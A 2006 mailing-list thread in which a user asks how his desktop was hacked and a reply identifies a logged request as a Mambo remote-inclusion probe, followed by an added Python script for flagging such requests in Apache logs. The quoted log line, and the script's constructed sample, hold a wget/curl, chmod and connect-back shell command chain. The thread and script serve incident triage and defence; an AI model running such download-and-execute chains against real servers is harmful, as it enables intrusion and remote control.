My home desktop was compromised, but how?

Dennis Kaarsemaker dennis at kaarsemaker.net
Tue Feb 28 21:44:23 UTC 2006


On di, 2006-02-28 at 15:44 -0500, Carthik Sharma wrote:
> Somebody seems to have hacked into my desktop/server. I find files in
> the /tmp/ (like "agent.8213") directory which I cannot open, these are
> setuid-ed -- how do I open these?

These may very well be normal; many applications place things in /tmp.

Try sudo ls /tmp/agent.8213 to see the contents

> In my apache access logs, there are things like
> "http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%
> 20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%
> 208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt
> %20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%
> 20http://216.99.218.183/cback;chmod%20744%20cback;./cback%
> 20217.160.242.90%208081;curl%20-o%20dc.txt%
> 20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%
> 20217.160.242.90%208081;echo%20YYY;echo|"
> 
> That above is a valid url, and will take you to a script to deface
> someone's php script etc, I suppose. Now, how did this malicious
> hacker get in my computer? 

That is just an attempt to deface a mambo site. If you don't use mambo:
don't worry (anyone can request any weird looking url on your server,
and it'll end up in your log). If you do run mambo: make sure you're up
to date.
-- 
Dennis K.
 - Linux for human beings - http://www.ubuntu.com
 - Linux voor normale mensen - htp://www.ubuntu-nl.org
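
Added example, not part of the original message: a log-triage sketch in Python for the point made in the reply, that a logged request is only an attempt. It decodes each request, flags those that carry a remote URL plus a shell command chain, and uses the HTTP status to separate rejected probes from ones that need a closer look. The log lines are constructed (documentation-range addresses), and the paths and the `page` parameter name are hypothetical.

```python
import re
from urllib.parse import unquote

# Constructed sample in Apache "combined" format. Addresses come from the
# documentation ranges; the paths and the "page" parameter are hypothetical.
SAMPLE_LOG = """\
192.0.2.10 - - [28/Feb/2006:20:01:12 +0000] "GET /index.php?page=http://198.51.100.7/cmd.txt?&cmd=cd%20/tmp;wget%20198.51.100.9/cback;chmod%20744%20cback;./cback%20203.0.113.5%208081;echo%20YYY;echo| HTTP/1.1" 404 312 "-" "Mozilla/4.0"
192.0.2.44 - - [28/Feb/2006:20:03:40 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [28/Feb/2006:20:05:02 +0000] "GET /cms/index.php?page=http://198.51.100.7/cmd.txt?&cmd=id;echo%20YYY;echo| HTTP/1.1" 200 48213 "-" "Mozilla/4.0"
"""

# client, timestamp, method, request target, protocol, status, size
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (.*?) (HTTP/[\d.]+)" (\d{3}) (\S+)')
# A query parameter whose value is itself a URL (remote file inclusion probe).
REMOTE_URL_RE = re.compile(r'[?&][^=&]+=(?:https?|ftp)://', re.I)
# Download/permission/interpreter commands or shell separators after decoding.
SHELL_CMD_RE = re.compile(r'\b(?:wget|curl|chmod|perl)\b|[;|]')


def triage(log_text):
    """Return one finding per request that looks like an inclusion probe."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        client, _ts, _method, target, _proto, status, _size = m.groups()
        decoded = unquote(target)  # %20 -> space, so the commands are readable
        if not (REMOTE_URL_RE.search(decoded) and SHELL_CMD_RE.search(decoded)):
            continue
        status = int(status)
        # 4xx/5xx: the server refused or had no such script. Anything else
        # means a page was served, so check whether that application is
        # installed and up to date; a 200 alone does not prove compromise.
        verdict = "rejected" if status >= 400 else "review"
        findings.append({"client": client, "status": status,
                         "verdict": verdict, "path": decoded.split("?", 1)[0]})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"{f['client']} {f['path']} -> {f['status']} ({f['verdict']})")
```
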